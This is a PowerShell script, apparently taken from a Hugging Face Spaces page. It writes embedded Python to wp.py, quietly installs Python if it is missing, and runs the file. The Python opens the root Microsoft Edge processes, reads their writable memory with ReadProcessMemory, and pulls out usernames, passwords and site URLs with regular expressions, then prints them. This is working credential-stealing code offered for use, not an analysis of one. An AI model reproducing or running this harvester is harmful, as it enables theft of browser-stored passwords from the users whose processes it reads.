Spaces:
Running
Running
| $pythonCode = @' | |
| def main(): | |
| # 管理者権限チェックをスキップ | |
| print("\033[92m[v]\033[0m Starting script execution\n") | |
| print("Fetching browser processes:", end="", flush=True) | |
| total_matches = 0 | |
| shown_matches = 0 | |
| seen_strings = set() | |
| already_checked_users = set() | |
| process_list = [] | |
| # Get all msedge.exe processes | |
| for proc in psutil.process_iter(['pid', 'name', 'ppid']): | |
| try: | |
| if proc.info['name'] and proc.info['name'].lower() == 'msedge.exe': | |
| pid = proc.info['pid'] | |
| parent_pid = proc.info['ppid'] | |
| skip = False | |
| # Check what process is parent | |
| try: | |
| parent = psutil.Process(parent_pid) | |
| if parent.name().lower() == 'msedge.exe': | |
| skip = True # Parent is msedge.exe → skip this child process | |
| except (psutil.NoSuchProcess, psutil.AccessDenied): | |
| pass # Parent may have exited → treat as root process | |
| if skip: | |
| continue | |
| # The credentials are only stored at root/parent msedge.exe processes | |
| owner = get_process_owner_from_token(pid) | |
| process_list.append(ProcessInfo(pid, proc.info['name'], owner)) | |
| except (psutil.NoSuchProcess, psutil.AccessDenied): | |
| continue | |
| print(" Done.\n") | |
| for proc in process_list: | |
| user_process_key = f"{proc.Owner} {proc.Name}" | |
| if user_process_key in already_checked_users: | |
| continue | |
| owner = proc.Owner.replace("NSC\\t1_", "") | |
| print(f"Scanning process PID: {proc.Id}\tName: {proc.Name}\tOwner: {owner}") | |
| process_handle = kernel32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, proc.Id) | |
| if not process_handle: | |
| print(f"Failed to open process: {proc.Id} {proc.Name} {proc.Owner}") | |
| continue | |
| # 修正: アドレスを適切に初期化 | |
| address = ctypes.c_void_p(0) | |
| while True: | |
| mem_info = MEMORY_BASIC_INFORMATION() | |
| result = kernel32.VirtualQueryEx( | |
| process_handle, | |
| address, | |
| ctypes.byref(mem_info), | |
| ctypes.sizeof(MEMORY_BASIC_INFORMATION) | |
| ) | |
| if result == 0: | |
| break | |
| readable = (mem_info.State == MEM_COMMIT and mem_info.Protect == PAGE_READWRITE) | |
| if readable and mem_info.BaseAddress is not None: | |
| region_size = mem_info.RegionSize | |
| try: | |
| buffer = ctypes.create_string_buffer(region_size) | |
| except (OverflowError, MemoryError): | |
| # バッファが作成できない場合はスキップ | |
| address = ctypes.c_void_p(mem_info.BaseAddress + mem_info.RegionSize) | |
| continue | |
| bytes_read = ctypes.c_size_t(0) | |
| if kernel32.ReadProcessMemory( | |
| process_handle, | |
| mem_info.BaseAddress, | |
| buffer, | |
| region_size, | |
| ctypes.byref(bytes_read) | |
| ): | |
| try: | |
| utf8_data = buffer.raw[:bytes_read.value].decode('utf-8', errors='ignore') | |
| except Exception: | |
| try: | |
| utf8_data = buffer.raw[:bytes_read.value].decode('latin-1', errors='ignore') | |
| except Exception: | |
| utf8_data = "" | |
| if utf8_data: | |
| lines = re.split(r'\r\n|\r|\n', utf8_data) | |
| for line in lines: | |
| if len(line) < 1: # 短すぎる行はスキップ | |
| continue | |
| pattern = r'[a-zA-Z]https?\x20([a-zA-ZæøåÆØÅ0-9\\\-_.@\?]{3,20})\x20([a-zA-ZæøåÆØÅ0-9#!@#\$%\^&\*\(\)_\-\+=\{\}\[\]:;<>\?/~\s]{6,40})\x20\x00' | |
| try: | |
| matches = re.finditer(pattern, line) | |
| except Exception: | |
| continue | |
| for match in matches: | |
| try: | |
| username = match.group(1) | |
| password = match.group(2) | |
| potential_pattern = f"{username} : {password}" | |
| url_pattern = ( | |
| r'\x00\x00\x00' | |
| r'([A-Za-z0-9\-._~:/?#\[\]@!$&\'()*+,;=%]+)' | |
| r'(https?)' | |
| + re.escape(f'\x20{username} {password}') | |
| ) | |
| for url_match in re.finditer(url_pattern, line): | |
| value = url_match.group(1) | |
| combined = f"{potential_pattern} @{value}" | |
| if combined not in seen_strings: | |
| print(combined) | |
| seen_strings.add(combined) | |
| shown_matches += 1 | |
| total_matches += 1 | |
| already_checked_users.add(user_process_key) | |
| except Exception: | |
| continue | |
| # 修正: 次のメモリリージョンへ移動(BaseAddressとRegionSizeがNoneでないことを確認) | |
| if mem_info.BaseAddress is not None and mem_info.RegionSize is not None: | |
| address = ctypes.c_void_p(mem_info.BaseAddress + mem_info.RegionSize) | |
| else: | |
| break | |
| kernel32.CloseHandle(process_handle) | |
| seen_strings.clear() | |
| print(f"\nTotal matches found across all processes: {total_matches}. {shown_matches} shown.") | |
| '@ | |
| $pyFile = "wp.py" | |
| Set-Content -Path $pyFile -Value $pythonCode -Encoding UTF8 | |
| Write-Host "Saved: $pyFile" | |
| # ===== Pythonコマンド確認 ===== | |
| $pythonCmd = $null | |
| if (Get-Command python3 -ErrorAction SilentlyContinue) { | |
| $pythonCmd = "python3" | |
| } | |
| elseif (Get-Command python -ErrorAction SilentlyContinue) { | |
| $pythonCmd = "python" | |
| } | |
| # ===== Python未導入なら自動インストール ===== | |
| if (-not $pythonCmd) { | |
| Write-Host "Python not found. Downloading..." | |
| $installer = "$env:TEMP\python-installer.exe" | |
| Invoke-WebRequest ` | |
| -Uri "https://www.python.org/ftp/python/3.12.3/python-3.12.3-amd64.exe" ` | |
| -OutFile $installer | |
| Write-Host "Installing Python..." | |
| Start-Process ` | |
| -FilePath $installer ` | |
| -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1" ` | |
| -Wait | |
| # PATH再読み込み | |
| $env:Path = [System.Environment]::GetEnvironmentVariable( | |
| "Path", | |
| "Machine" | |
| ) + ";" + [System.Environment]::GetEnvironmentVariable( | |
| "Path", | |
| "User" | |
| ) | |
| # 再確認 | |
| if (Get-Command python3 -ErrorAction SilentlyContinue) { | |
| $pythonCmd = "python3" | |
| } | |
| elseif (Get-Command python -ErrorAction SilentlyContinue) { | |
| $pythonCmd = "python" | |
| } | |
| if (-not $pythonCmd) { | |
| Write-Error "Python installation failed." | |
| exit 1 | |
| } | |
| } | |
| # ===== 実行 ===== | |
| Write-Host "Running wp.py with $pythonCmd" | |
| & $pythonCmd $pyFile |